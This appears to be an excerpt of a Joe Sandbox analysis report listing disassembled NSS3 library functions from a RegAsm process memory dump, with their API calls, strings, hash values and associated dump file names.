Opcode Fuzzy Hash: 3bd5c3780a9b04be66441512d025adb950fa756d2d92f41948c58254f1f9a0a6
Instruction Fuzzy Hash: E1A107719242009BEB409B24DD57B6A32E5EF8130CF288939E919CBB91E735D8D9C7D3

Function 6CA5AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5AF39
PR_Unlock.NSS3(?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5AF69
TlsGetValue.KERNEL32 ref: 6CA5B06B
EnterCriticalSection.KERNEL32(?), ref: 6CA5B083
PR_Unlock.NSS3(?), ref: 6CA5B0A4
TlsGetValue.KERNEL32 ref: 6CA5B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CA5B0D9
PR_Unlock.NSS3 ref: 6CA5B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA5B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA5B182

Part of subcall function 6CA8FAB0: free.MOZGLUE(?,-00000001,?,?,6CA2F673,00000000,00000000), ref: 6CA8FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA5B177

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CA3AB95,00000000,?,00000000,00000000,00000000), ref: 6CA5B1C2

Part of subcall function 6CA81560: TlsGetValue.KERNEL32(00000000,?,6CA50844,?), ref: 6CA8157A
Part of subcall function 6CA81560: EnterCriticalSection.KERNEL32(?,?,?,6CA50844,?), ref: 6CA8158F
Part of subcall function 6CA81560: PR_Unlock.NSS3(?,?,?,?,6CA50844,?), ref: 6CA815B2

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 04d90f2b6c3bebfe489d242dfe5430ff64ecc3f133fbdd941f9163ee449bb837
Instruction ID: 66f02c37119656128698f515a1d2309b3e2c11b7366f6d440f903e97682bad76
Opcode Fuzzy Hash: 04d90f2b6c3bebfe489d242dfe5430ff64ecc3f133fbdd941f9163ee449bb837
Instruction Fuzzy Hash: 7DA1A0B1E00205ABEF009F64ED41AAEB7B4BF05309F548125E905A7752E731E9E9CBE1

Function 6CAAAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAAADB1

Part of subcall function 6CA8BE30: SECOID_FindOID_Util.NSS3(6CA4311B,00000000,?,6CA4311B,?), ref: 6CA8BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAAADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAAAE08

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAAAE25
PL_FreeArenaPool.NSS3 ref: 6CAAAE63
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CAAAE4D

Part of subcall function 6C9B4C70: TlsGetValue.KERNEL32(?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4C97
Part of subcall function 6C9B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CB0
Part of subcall function 6C9B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAAAE93
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CAAAECC
PL_FreeArenaPool.NSS3 ref: 6CAAAEDE
PL_FinishArenaPool.NSS3 ref: 6CAAAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAAAEF5
PL_FinishArenaPool.NSS3 ref: 6CAAAF16

Strings

security, xrefs: 6CAAADEE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 48af04c0030b0203fa682d961a6c729bd618f0503ff09dfbee64f1ac9dafa8c2
Instruction ID: a5b5bd8927463804d8c4851ea894883e6d73d74925614a370c9bf26a9dcb581a
Opcode Fuzzy Hash: 48af04c0030b0203fa682d961a6c729bd618f0503ff09dfbee64f1ac9dafa8c2
Instruction Fuzzy Hash: A84127B680022067E7315AA49D45BAA32FAAF4631CF140525E81493B41F7359DCE8EE3

Function 6CAC5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CAC2A28,00000060,00000001), ref: 6CAC2BF0
Part of subcall function 6CAC2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CAC2A28,00000060,00000001), ref: 6CAC2C07
Part of subcall function 6CAC2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CAC2A28,00000060,00000001), ref: 6CAC2C1E
Part of subcall function 6CAC2BE0: free.MOZGLUE(?,00000000,00000000,?,6CAC2A28,00000060,00000001), ref: 6CAC2C4A

free.MOZGLUE(?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5D0F
free.MOZGLUE(?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5D4E
free.MOZGLUE(?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5D62
free.MOZGLUE(?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5D85
free.MOZGLUE(?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5D99
free.MOZGLUE(?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CAC5E3E
free.MOZGLUE(?,?,?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CAC5E47
free.MOZGLUE(?,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000,?,6CAC80C1), ref: 6CAC5E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CACAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CAC5E78
free.MOZGLUE(?,?,?,?,?,?,?,6CACAAD4), ref: 6CAC5EB9
free.MOZGLUE(?,?,?,?,?,?,?,6CACAAD4), ref: 6CAC5EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CAC5F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CAC5F4B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 5ca3e72ace27eb66cf22ee50c8ee9578ad32104c86e10b3a2f68af3f0c20c361
Instruction ID: a17b418499cfeee4402667ea4a38e0b833d2fd29da7af6a05f1698eb506a9782
Opcode Fuzzy Hash: 5ca3e72ace27eb66cf22ee50c8ee9578ad32104c86e10b3a2f68af3f0c20c361
Instruction Fuzzy Hash: B77193B5A00B019FD701CF24D984A92B7F5FF89308F148629E86E97711EB31F999CB52

Function 6CA48DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CA48E22
EnterCriticalSection.KERNEL32(?), ref: 6CA48E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CA48E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CA48E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA48E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA48EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CA48EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA48EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CA48F00
free.MOZGLUE(?), ref: 6CA48F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CA48F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CA48F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CA48F5B
PR_Unlock.NSS3(?), ref: 6CA48F72
PR_Unlock.NSS3(?), ref: 6CA48F82

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: dfe6bdd6d5c5184f3e752f09c2419927beabffac2859152e41cbacb716661cdb
Instruction ID: 56bee7663ac36cb29c69a5cf3e3592afa5c5b41dc2bad3342a7383e312572ab8
Opcode Fuzzy Hash: dfe6bdd6d5c5184f3e752f09c2419927beabffac2859152e41cbacb716661cdb
Instruction Fuzzy Hash: 595105B2D01201AFDB009F68DC8596EB7B9EF45358B19C52AEC18DB700E731ED8587D1

Function 6CA6CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CA6CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA6CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CA6CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CA6CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CA6CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA6CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CA6CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CA6CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CA6CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CA6CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CA6CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CA6CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CA6CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CA6D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CA6D021

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: a4a4737aad796305d88dbdd1863e72ecdaf736e7e89bb50e5922bf9e05354c74
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 0231A671F1791123EF0D04579D21BEE149A4B6534EF0A0138F94BE5BC0F685979B42F9

Function 6CA55E60 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA55ECF
EnterCriticalSection.KERNEL32(?), ref: 6CA55EE3
PR_Unlock.NSS3(?), ref: 6CA55F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6CA55FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6CA561F4

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT
API String ID: 2280678669-837408685
Opcode ID: 715a5be71e45c74f7c44952f64d8948976015eabef13244f152af6be78a72697
Instruction ID: 0e94ef43c5422d4b1d08c77b7312b48c46995adaf291459db6b7a23c960caeef
Opcode Fuzzy Hash: 715a5be71e45c74f7c44952f64d8948976015eabef13244f152af6be78a72697
Instruction Fuzzy Hash: F6F115B4A002158FDB44CF18C984B96BBF4FF09314F5582AADC089B746E774EA98CF91

Function 6C9BDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C9BDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C9BDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C9BDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C9BDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9BDECD

Strings

database corruption, xrefs: 6C9BDF77, 6C9BDFE7
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9BDF6D, 6C9BDFCC, 6C9BDFDD
%s at line %d of [%.10s], xrefs: 6C9BDF7C, 6C9BDFEC

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 492a51e48bed1298b8363a1840d341df2d03558e4aadfa27c2d6a56b8b0bff07
Instruction ID: 54166a884e613128b054157634abf2b8b73677b98470ca88903356eecc6d86c1
Opcode Fuzzy Hash: 492a51e48bed1298b8363a1840d341df2d03558e4aadfa27c2d6a56b8b0bff07
Instruction Fuzzy Hash: 4FA1F972608241AFD710CF29C880A6BB7F9EF95318F15892CF889ABF45D730E855CB91

Function 6CA7EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CA7EE0B

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA7EEE1

Part of subcall function 6CA71D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CA71D7E
Part of subcall function 6CA71D50: EnterCriticalSection.KERNEL32(?), ref: 6CA71D8E
Part of subcall function 6CA71D50: PR_Unlock.NSS3(?), ref: 6CA71DD3

TlsGetValue.KERNEL32 ref: 6CA7EE51
EnterCriticalSection.KERNEL32(?), ref: 6CA7EE65
PR_Unlock.NSS3(?), ref: 6CA7EEA2
free.MOZGLUE(?), ref: 6CA7EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CA7EED0
PR_Unlock.NSS3(?), ref: 6CA7EF48
free.MOZGLUE(?), ref: 6CA7EF68
PR_SetError.NSS3(00000000,00000000), ref: 6CA7EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CA7EFA4
free.MOZGLUE(?), ref: 6CA7EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA7F055
free.MOZGLUE(?), ref: 6CA7F060

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: dc797835215461642992219997229eeb7696fb4edd3555fd1fe4093aaf80f4df
Instruction ID: 31eb28ccece453e685cbf5f5109d6f97110f4b02c6ba81cd8468d644287d8e50
Opcode Fuzzy Hash: dc797835215461642992219997229eeb7696fb4edd3555fd1fe4093aaf80f4df
Instruction Fuzzy Hash: 7F8184B5E00205AFDF10DF64DD85AEE7BB5BF09318F184424E919A3711E731E9A8CBA1

Function 6CA44CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CA44D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CA44D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CA44DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA44E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CA44E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CA44E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CA44E85
DER_Encode_Util.NSS3(?,?,6CB905A4,00000000), ref: 6CA44EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CA44F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CA44F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA44F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA44F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA44F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA44FC8

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 795b41defd20d0de9c460ec08a45cdbe30056b27f47c0b845fee6d80c78d6aaa
Instruction ID: f06a90b912f713073c949b4c8ce06e8eed8f54fcc41392fc9dbbc628659af4bb
Opcode Fuzzy Hash: 795b41defd20d0de9c460ec08a45cdbe30056b27f47c0b845fee6d80c78d6aaa
Instruction Fuzzy Hash: C081B171908301AFE701CF24DD81B5AB7E4AB84758F14C52DF959DB641E730E988CB92

Function 6CA85C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CA85C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CA85CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CA85CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CA85D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CA85D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA85D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CA85E18
TlsGetValue.KERNEL32 ref: 6CA85E5E
EnterCriticalSection.KERNEL32(?), ref: 6CA85E72
PR_Unlock.NSS3(?), ref: 6CA85E8B

Part of subcall function 6CA7F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA7F854
Part of subcall function 6CA7F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA7F868
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA7F882
Part of subcall function 6CA7F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA7F889
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA7F8A4
Part of subcall function 6CA7F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA7F8AB
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA7F8C9
Part of subcall function 6CA7F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA7F8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6CA85D3D
d, xrefs: 6CA85C36

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 954d62dde9eebd434dacc080f901d5b16894cd559fccfae963cf30bac962638a
Instruction ID: 93b1ca34b2e01efbba03de55a92a148e1ecdac122dc34306263be8429e04f576
Opcode Fuzzy Hash: 954d62dde9eebd434dacc080f901d5b16894cd559fccfae963cf30bac962638a
Instruction Fuzzy Hash: D071D2F0E061019BFB009F25DD4576A3679BF4131CF180035EC1A9BB42EB32E999CBA2

Function 6CA76C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

